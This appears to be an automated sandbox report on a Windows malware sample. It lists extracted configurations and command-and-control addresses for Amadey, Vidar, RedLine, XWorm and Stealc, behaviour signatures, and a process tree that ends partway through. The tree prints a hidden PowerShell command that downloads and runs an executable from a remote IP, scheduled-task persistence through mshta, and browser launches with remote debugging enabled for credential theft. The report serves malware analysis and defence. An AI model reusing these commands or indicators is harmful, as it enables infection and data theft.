Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 07:26

General

  • Target

    78796a8755ee5cc1c74279bbba9dadd9.exe

  • Size

    938KB

  • MD5

    78796a8755ee5cc1c74279bbba9dadd9

  • SHA1

    21dd52e48d9e8b0cd2ee2702e2c1353f61ae32f6

  • SHA256

    bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e

  • SHA512

    53ff56fbd963d5288829e87158373ab57862d7cc8b721c0e2cd5672c3042824e85d456f648180b731059c400d1e6e02b3cd5c8c0a9952c33e9f9034e95ba6ec0

  • SSDEEP

    24576:cqDEvCTbMWu7rQYlBQcBiT6rprG8a0qu:cTvC/MTQYxsWR7a0q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

testproliv

C2

45.155.103.183:1488

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:6666

5.180.155.29:6666

Mutex

O3GT6cT0bZJp53nK

Attributes
  • Install_directory

    %Temp%

  • install_file

    winservice.exe

aes.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • Detect Xworm Payload 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 19 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\78796a8755ee5cc1c74279bbba9dadd9.exe
    "C:\Users\Admin\AppData\Local\Temp\78796a8755ee5cc1c74279bbba9dadd9.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn ttwnomajAPC /tr "mshta C:\Users\Admin\AppData\Local\Temp\dOQsdkHdL.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn ttwnomajAPC /tr "mshta C:\Users\Admin\AppData\Local\Temp\dOQsdkHdL.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1336
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\dOQsdkHdL.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IBCXQIFOMDG3KFSGNDFDFWO6AXP4WNUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Users\Admin\AppData\Local\TempIBCXQIFOMDG3KFSGNDFDFWO6AXP4WNUS.EXE
          "C:\Users\Admin\AppData\Local\TempIBCXQIFOMDG3KFSGNDFDFWO6AXP4WNUS.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:892
            • C:\Users\Admin\AppData\Local\Temp\10100160101\6c145582c2.exe
              "C:\Users\Admin\AppData\Local\Temp\10100160101\6c145582c2.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3572
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:2220
            • C:\Users\Admin\AppData\Local\Temp\10100170101\22b5593f92.exe
              "C:\Users\Admin\AppData\Local\Temp\10100170101\22b5593f92.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3616
              • C:\Users\Admin\AppData\Local\Temp\10100170101\22b5593f92.exe
                "C:\Users\Admin\AppData\Local\Temp\10100170101\22b5593f92.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:348
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 808
                7⤵
                • Program crash
                PID:4768
            • C:\Users\Admin\AppData\Local\Temp\10100180101\484236d5ff.exe
              "C:\Users\Admin\AppData\Local\Temp\10100180101\484236d5ff.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2208
            • C:\Users\Admin\AppData\Local\Temp\10100190101\2ce67dea69.exe
              "C:\Users\Admin\AppData\Local\Temp\10100190101\2ce67dea69.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4404
            • C:\Users\Admin\AppData\Local\Temp\10100200101\e9cd45ab60.exe
              "C:\Users\Admin\AppData\Local\Temp\10100200101\e9cd45ab60.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4988
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:2744
            • C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe
              "C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4964
              • C:\Windows\TEMP\{9FEA5D15-9CE4-42C6-BCA9-44BB9C090775}\.cr\z3SJkC5.exe
                "C:\Windows\TEMP\{9FEA5D15-9CE4-42C6-BCA9-44BB9C090775}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe" -burn.filehandle.attached=656 -burn.filehandle.self=652
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:5048
                • C:\Windows\TEMP\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\WiseTurbo.exe
                  C:\Windows\TEMP\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\WiseTurbo.exe
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2076
                  • C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                    C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4844
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      10⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:1656
                      • C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                        C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                        11⤵
                        • Loads dropped DLL
                        PID:4032
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 668
                  8⤵
                  • Program crash
                  PID:2884
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 676
                  8⤵
                  • Program crash
                  PID:3388
            • C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe
              "C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4896
            • C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1704
              • C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                PID:1964
              • C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:3664
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  8⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:2164
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff7961cc40,0x7fff7961cc4c,0x7fff7961cc58
                    9⤵
                      PID:1032
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1924 /prefetch:2
                      9⤵
                        PID:3760
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2192,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1948 /prefetch:3
                        9⤵
                          PID:3264
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2272 /prefetch:8
                          9⤵
                            PID:5000
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:4928
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:2820
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3648 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:4884
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
                            9⤵
                              PID:5016
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4804 /prefetch:8
                              9⤵
                                PID:4512
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4952 /prefetch:8
                                9⤵
                                  PID:5140
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4244,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4284 /prefetch:8
                                  9⤵
                                    PID:5544
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8
                                    9⤵
                                      PID:5700
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                      9⤵
                                        PID:5752
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4208,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
                                        9⤵
                                          PID:5792
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4284,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5140 /prefetch:8
                                          9⤵
                                            PID:5196
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4896,i,6732123586514210784,15151651042599953951,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5004 /prefetch:2
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:6088
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                          8⤵
                                          • Uses browser remote debugging
                                          • Enumerates system info in registry
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5636
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff796246f8,0x7fff79624708,0x7fff79624718
                                            9⤵
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            PID:5568
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
                                            9⤵
                                              PID:5988
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
                                              9⤵
                                                PID:6004
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
                                                9⤵
                                                  PID:6036
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:5256
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:5248
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:4916
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4141292183105639683,3291600827819275256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:1216
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 808
                                              7⤵
                                              • Program crash
                                              PID:4500
                                          • C:\Users\Admin\AppData\Local\Temp\10100240101\zY9sqWs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10100240101\zY9sqWs.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3420
                                          • C:\Users\Admin\AppData\Local\Temp\10100250101\v6Oqdnc.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10100250101\v6Oqdnc.exe"
                                            6⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2884
                                          • C:\Users\Admin\AppData\Local\Temp\10100260101\OEHBOHk.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10100260101\OEHBOHk.exe"
                                            6⤵
                                            • Checks computer location settings
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious behavior: AddClipboardFormatListener
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4948
                                            • C:\Windows\System32\schtasks.exe
